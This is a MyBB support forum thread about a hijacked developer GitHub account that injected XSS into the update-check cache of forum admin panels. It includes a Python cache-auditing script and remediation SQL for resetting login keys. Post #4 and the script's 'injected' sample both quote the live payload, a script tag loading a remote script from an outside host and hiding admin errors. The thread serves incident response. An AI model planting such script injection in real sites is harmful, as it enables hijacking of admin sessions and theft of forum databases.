[IMPORTANT] GitHub Account Attack
#1
We've been following the reports here over the past 2 days in order to figure out the extent of the issue. I've just updated the blog post with more information but I'm going to post it here just in case people miss it.

Please check your ACP -> Tools & Maintenance -> Administrator Logs for suspicious activity!
Please check your ACP -> Tools & Maintenance -> Cache Manager -> 'update_check'. If it contains news data only then you're safe:
Array
(
    [last_check] => 1416222660
    [news] => Array
        (
            [0] => Array
                (
                    [title] => GitHub Account Compromised
                    [description] => UPDATE: Updated the page in which you should check for suspicious activity. It should be the Admin Logs page, not the Database Backups.   Hello, Yesterday, 14th of November, my (Pirata Nervo) GitHub account was compromised. By taking advantage of that, the attacker made a commit to our GH pages, more specifically one which is […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/9jWBtaXX3d8/
                    [author] => Pirata Nervo
                    [dateline] => 1416069961
                )

            [1] => Array
                (
                    [title] => MyBB 1.8.2 Released – Security Release
                    [description] => MyBB 1.8.2 is now available from the MyBB website. It fixes 1 high risk vulnerability, 2 medium risk vulnerabilities and 2 low risk vulnerabilities. We recommend everyone upgrades to this release immediately. MyBB 1.6.15 is not affected by these vulnerabilities. What’s added/changed in this version? The vulnerabilities are: High Risk: A SQL injection vulnerability in […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/EkqazJvmZXc/
                    [author] => StefanT
                    [dateline] => 1415917805
                )

            [2] => Array
                (
                    [title] => MyBB 1.8.1 & Merge System 1.8.1 Release
                    [description] => MyBB 1.8.1 – Maintenance Release MyBB 1.8.1 is now available from the MyBB website and is a maintenance release. What’s added/changed in this version? This release fixes 74 reported issues causing incorrect functionality of MyBB. Please be aware that to be able to provide easy to manage updates not all issues have been fixed in this version. Bugs […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/erxFg7H84tQ/
                    [author] => StefanT
                    [dateline] => 1414093168
                )

        )

)


If it contains a version code and it is different from this (e.g. showing 1803 instead of 1802 and having <script> tags in the latest_version field):
Array
(
    [last_check] => 1416085808
    [latest_version] => <span style="color: #C00;"><strong>1.8.2</strong> (1802)</span>
    [latest_version_code] => 1802
)
then you need to reset the cache for it! (Rebuild Cache)
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
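The check described in post #1 (news-only cache is fine; a latest_version string carrying extra markup or a version code other than 1802 is not) can be run against the stored cache row rather than by eye. The following is an added example, not code from MyBB or from anyone in this thread. It assumes the datacache row for update_check holds PHP serialize() output, so it includes a minimal unserializer; the sample cache values are constructed from the two print_r dumps shown in the thread, and 1802 is taken as the genuine current version code because that is what post #1 names.

```python
import re
from typing import Any, Dict, List, Tuple

# Assumption: the datacache entry for 'update_check' is PHP serialize() output.
EXPECTED_VERSION_CODE = 1802        # 1.8.2, the genuine release named in post #1
ALLOWED_TAGS = {"span", "strong"}   # markup the genuine latest_version string uses


def php_serialize(value: Any) -> bytes:
    """Minimal PHP serialize() for ints, strings and dicts (used here to build samples)."""
    if isinstance(value, bool):
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return f"i:{value};".encode()
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(f"unsupported value type {type(value).__name__}")


def _parse(buf: bytes, pos: int) -> Tuple[Any, int]:
    """Parse one serialized value at buf[pos]; return (value, position after it)."""
    t = buf[pos:pos + 1]
    if t == b"i":
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if t == b"b":
        end = buf.index(b";", pos)
        return buf[pos + 2:end] == b"1", end + 1
    if t == b"s":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])       # byte length, so embedded quotes are harmless
        start = colon + 2                      # skip  :"
        if buf[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match payload")
        return buf[start:start + length].decode("utf-8"), start + length + 2
    if t == b"a":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2                        # skip  :{
        out: Dict[Any, Any] = {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            val, pos = _parse(buf, pos)
            out[key] = val
        if buf[pos:pos + 1] != b"}":
            raise ValueError("unterminated array")
        return out, pos + 1
    raise ValueError(f"unsupported type {t!r} at offset {pos}")


def php_unserialize(data: bytes) -> Any:
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after value")
    return value


def audit_update_check(cache: Dict[str, Any]) -> List[str]:
    """Return a list of findings; an empty list means the cache looks like the genuine one."""
    findings: List[str] = []
    if "latest_version" not in cache and "latest_version_code" not in cache:
        return findings                        # news-only cache: the safe case from post #1
    html = str(cache.get("latest_version", ""))
    tags = {m.group(1).lower() for m in re.finditer(r"<\s*/?\s*([a-zA-Z][\w-]*)", html)}
    unexpected = tags - ALLOWED_TAGS
    if unexpected:
        findings.append(f"unexpected markup in latest_version: {sorted(unexpected)}")
    if re.search(r"\bon\w+\s*=|javascript:", html, re.I):
        findings.append("event handler or javascript: URL in latest_version")
    code = cache.get("latest_version_code")
    if code != EXPECTED_VERSION_CODE:
        findings.append(f"latest_version_code is {code!r}, expected {EXPECTED_VERSION_CODE}")
    shown = re.search(r"\((\d{4})\)", html)
    if shown and int(shown.group(1)) != code:
        findings.append("version code in display string does not match latest_version_code")
    return findings


def audit_serialized(data: bytes) -> List[str]:
    return audit_update_check(php_unserialize(data))


# Constructed samples modelled on the dumps in this thread.
CLEAN_CACHE = php_serialize({
    "last_check": 1416085808,
    "latest_version": '<span style="color: #C00;"><strong>1.8.2</strong> (1802)</span>',
    "latest_version_code": 1802,
})
INJECTED_CACHE = php_serialize({
    "last_check": 1416049591,
    "latest_version": '<span style="color: #C00;"><strong>1.8.2 <script src="http://hub.org/analytics.php" async></script>'
                      '<script>$(\'.error\').hide();</script></strong> (1803)</span>',
    "latest_version_code": 1803,
})
NEWS_ONLY_CACHE = php_serialize({"last_check": 1416222660, "news": {0: {"title": "constructed item"}}})

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_CACHE), ("injected", INJECTED_CACHE), ("news-only", NEWS_ONLY_CACHE)]:
        print(name, audit_serialized(blob) or "OK")
```

To use it on a real board, pull the `cache` column of the update_check row out of the datacache table and pass the bytes to audit_serialized(); if the board uses a file or memcache cache handler instead, read the same serialized value from there. Any finding means the cache should be rebuilt and the admin logs reviewed as post #1 describes.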
#2
So, just to make sure. If I entered the ACP just now and still saw 1.8.1, and after I clicked to check for updates 1.8.2 began to show, does that mean the attacker couldn't attack my website? Is that right?
#3
In theory, yes. But you need to check your admin logs. If no backups were made by you without actually making them yourself, you're safe.
#4
Hi,

I read the blog post and accessed my Admin Panel to check if there were any database backups logged within the time span specified in the blog post.

There were none. No admin activity was logged for that specific time span.

However, the activity log said that I allegedly made the database backup myself right at the moment I logged in (which, of course, I did not do).

I then checked the update_check and it contained suspicious code like this:

Array
(
    [last_check] => 1416049591
    [latest_version] => <span style="color: #C00;"><strong>1.8.2 <script src="http://hub.org/analytics.php" async></script><script>$('.error').hide();</script></strong> (1803)</span>
    [latest_version_code] => 1803
    [news] => Array
        (
            [0] => Array
                (
                    [title] => MyBB 1.8.2 Released – Security Release
                    [description] => MyBB 1.8.2 is now available from the MyBB website. It fixes 1 high risk vulnerability, 2 medium risk vulnerabilities and 2 low risk vulnerabilities. We recommend everyone upgrades to this release immediately. MyBB 1.6.15 is not affected by these vulnerabilities. What’s added/changed in this version? The vulnerabilities are: High Risk: A SQL injection vulnerability in […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/EkqazJvmZXc/
                    [author] => StefanT
                    [dateline] => 1415917805
                )

            [1] => Array
                (
                    [title] => MyBB 1.8.1 & Merge System 1.8.1 Release
                    [description] => MyBB 1.8.1 – Maintenance Release MyBB 1.8.1 is now available from the MyBB website and is a maintenance release. What’s added/changed in this version? This release fixes 74 reported issues causing incorrect functionality of MyBB. Please be aware that to be able to provide easy to manage updates not all issues have been fixed in this version. Bugs […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/erxFg7H84tQ/
                    [author] => StefanT
                    [dateline] => 1414093168
                )

            [2] => Array
                (
                    [title] => MyBB Merge System 1.8
                    [description] => The MyBB Merge System for 1.8 is now available from the MyBB website. What’s new in this version? First we decided to drop some old modules which aren’t supported by their developers: BBPress 1 IP.Board 2 Mingle phpBB 2 vBulletin 3 And of course we’ve added more new modules (including some which you requested fairly […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/iSA6ZgMX-Us/
                    [author] => Jones
                    [dateline] => 1410948694
                )

        )

)

I rebuilt this cache and now it looks like this:

Array
(
    [dateline] => 1416234809
)

Please advise whether my forum is compromised or not and whether I should change passwords. Thx.
#5
Yes! You were attacked. It hurts me to say this. You should change your password and so should all your members.
#6
If you have database downloads in your logs that you didn't do, then you should change passwords and loginkeys.

(2014-11-16, 01:41 AM)frostschutz Wrote: If affected, admins and moderators should change their passwords, users should be advised to do the same, and for those who don't you should change the loginkeys in the users table. Something like this query: (haven't tested it)

UPDATE mybb_users SET loginkey='';

That relies on MyBB generating a new loginkey on the next login. If paranoid you could set something random yourself:

UPDATE mybb_users SET loginkey=SHA1(CONCAT(RAND(),UUID(),loginkey));

Either one should force everyone to re-login and make the old loginkeys in the stolen database useless. And brute-forcing the passwords hopefully should take a bit of time, since they're salted.
#7
(2014-11-17, 02:51 PM)Pirata Nervo Wrote: Yes! You were attacked. It hurts me to say this. You should change your password and so should all your members.

I wonder how this could be if none of my admins entered the Admin panel between the 14th and 15th of November? I entered it only today after reading the blog post. Does that mean that something is still wrong on GitHub?
#8
The version check / update check task was likely executed during that time and cached the XSS injection (this task didn't exist on 1.6 so it would only run for 1.8 users). It was just a matter of bad luck for you really. The issue is resolved on our end. I'm doing my best to alert people to fix their boards now.
#9
OK understood.

One last question - is it OK for me to change passwords for my users manually through the Admin Panel, or do they necessarily need to do that themselves?
#10
They can do it themselves sure.